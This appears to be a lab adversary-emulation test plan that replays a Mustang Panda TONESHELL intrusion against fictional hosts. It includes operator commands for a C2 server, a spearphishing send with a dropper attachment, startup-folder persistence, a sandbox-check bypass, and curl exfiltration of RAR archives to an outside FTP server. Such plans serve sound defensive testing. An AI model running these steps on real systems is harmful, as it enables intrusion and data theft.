# Protections Test 4 Scenario

# Setup

# Procedures

• ☣️ Initiate an RDP session to the Kali attack host driftmark (174.3.0.70)

  Destination	Username	Password
  174.3.0.70	op1	Barbed-Directive

• ☣️ In a new terminal window, start the simple file server and TONESHELL handler if they are not already running:

  cd /opt/kalidev/mustang_panda/controlServer/
  sudo go build -o controlServer main.go
  sudo ./controlServer -c config/protections.yml

  • Expected Output

    ...
    [SUCCESS] 2024/04/01 10:10:11 Started handler simplefileserver
    [SUCCESS] 2024/04/01 10:10:11 Started handler toneshell
    [INFO] 2024/04/01 10:10:11 Waiting for connections

• ☣️ Initiate an RDP session to the jumpbox dreadfort (10.26.3.125)

  Destination	Username	Password
  12.78.110.37	op1	Barbed-Directive

# Step 1 - Initial Access

# Voice Track

Mustang Panda sends an email from dnaharis@pentos.com to btully@vale.net containing a .zip file attachment. btully downloads and unzips the .zip file which contains 2 subfolders. The first subfolder Appendix I contains a PIF file Assessing Westeros-Essos Global Influence.pif, which is the TONESHELL dropper executable masquerading as a PIF file, while the second subfolder Appendix II contains a PDF file Assessing Westeros-Essos Global Influence (1).pdf.

When btully opens the PIF file (executes the TONESHELL dropper), the TONESHELL dropper checks for the presence of GFlagEditor in C:\ProgramData. If it does not exist, the TONESHELL dropper will create the folder C:\ProgramData\GFlagEditor and drop a legitimate binary gflags.exe and the TONESHELL loader gflagsui.dll into it. The TONESHELL dropper then opens the decoy PDF and creates a scheduled task to execute the legitimate binary.

# Procedures

• From the jumpbox, initiate an RDP session to the workstation bitterbridge (10.26.4.103)

  Destination	Username	Password
  bitterbridge.vale.net	vale\btully	Finished-Debug

• On the workstation bitterbridge (10.26.4.103), open FireFox and browse to the Outlook Web Access portal, logging in with btully's credentials

  Destination	Username	Password
  https://godswood.vale.net/owa	vale\btully	Finished-Debug

• ☣️ Switch to the Kali and open a new terminal to activate the Python virtual environment then send the spearphishing email

  cd /opt/kalidev/
  source venv/bin/activate
  python3 /opt/kalidev/mustang_panda/Resources/email_generation/send_email.py mail.pentos.com /opt/kalidev/mustang_panda/Resources/payloads/p4_spearphishing.html -t btully@vale.net -f dnaharis@pentos.com -fn 'Daario Naharis' -s 'Westeros-Essos Cyber Summit Read-Ahead Preparation' -a /opt/kalidev/mustang_panda/Resources/payloads/protections4.zip -an 'Assessing Westeros-Essos Global Influence.zip'

  • Expected Output

    Successfully sent email

• Switch to the RDP to the workstation bitterbridge (10.26.4.103) and confirm receipt of the spearphishing email

• Open the email and click to download the attachment Assessing Westeros-Essos Global Influence.zip

• Open the Downloads folder, right-click the ZIP file Assessing Westeros-Essos Global Influence.zip, click "Extract All...", then click "Extract"

• Navigate into the Appendex I directory and double-click to execute the PIF file Assessing Westeros-Essos Global Influence.pif, and click "Run". Wait until a CMD prompt flashes with GFlagEditor in the window name then switch windows several times to bypass the sandbox check

• ☣️ Switch to Kali then wait 5-8 minutes for C2 registration

# Reference Tables

# Step 2 - Discovery and Persistence

# Voice Track

After establishing C2, Mustang Panda discovers an active connection to the file server redfort (10.26.3.105). Mustang Panda then downloads a VBS script to the startup folder for persistent collection. When the legitimate user logs back in, the VBS script executes several RAR commands to archive files on the file server.

# Procedures

• ☣️ Task TONESHELL to execute netstat to discover the file server 10.26.3.105 (redfort)

  python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 5, "taskNum": 1, "args": "netstat -anop tcp"}'

  • Expected Output

    [TASK] 2025/07/30 20:31:55
    Active Connections
    Proto Local Address Foreign Address State PID
    TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 400
    TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
    TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1096

• ☣️ Task TONESHELL to download a file extension list used by the VBS collection script to the startup folder

  python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 3, "taskNum": 2, "payload": "files.txt", "args": "C:\\Windows\\Help\\en-US\\0.txt"}'

  • Expected Output

    File downloaded successfully

• ☣️ Task TONESHELL to download the VBS collection script to the startup folder

  python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 3, "taskNum": 3, "payload": "collection.vbs", "args": "C:\\Users\\btully\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\autoruns.vbs"}'

  • Expected Output

    File downloaded successfully

• Switch to the RDP to the workstation bitterbridge (10.26.4.103) and log out

• From the jumpbox, initiate an RDP session to log back in to the workstation bitterbridge (10.26.4.103). Wait until a CMD prompt appears with GFlagEditor in the window name then open File Explorer to bypass the sandbox check.

  Destination	Username	Password
  bitterbridge.vale.net	btully	Finished-Debug

# Reference Tables

# Step 3 - Exfiltration

# Voice Track

After archiving files, Mustang Panda executes curl.exe to exfiltrate the RAR files to an adversary-controlled FTP server.

# Procedures

• ☣️ Task TONESHELL to use curl.exe and exfiltrate the RAR files

  python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 70d6b5c1105063b81d9ce95866793488 '{"id": 5, "taskNum": 4, "args": "curl.exe -T \"{C:\\\\Windows\\\\Help\\\\Corporate\\\\67.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\69.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\70.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\71.rar,C:\\\\Windows\\\\Help\\\\Corporate\\\\72.rar}\" ftp://ftp_user:Gracious-Coat@49.67.12.21/4/ --ftp-create-dirs"}'

  • Expected Output

    [TASK] 2025/07/31 16:13:43
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100  714k    0     0  100  714k      0  1198k --:--:-- --:--:-- --:--:-- 1198k
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100 42.1M    0     0  100 42.1M      0  85.1M --:--:-- --:--:-- --:--:-- 85.1M
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100 84.3M    0     0  100 84.3M      0  89.8M --:--:-- --:--:-- --:--:-- 89.8M
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100 42.1M    0     0  100 42.1M      0  69.4M --:--:-- --:--:-- --:--:-- 69.4M
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100 84.3M    0     0  100 84.3M      0  86.6M --:--:-- --:--:-- --:--:-- 86.6M
    

# Reference Tables

# End of Test

# Voice Track

This step includes the shutdown procedures for the end of this Protections Test

# Procedures

• Return to the RDP to bitterbridge (10.26.4.103). Close all windows and signout.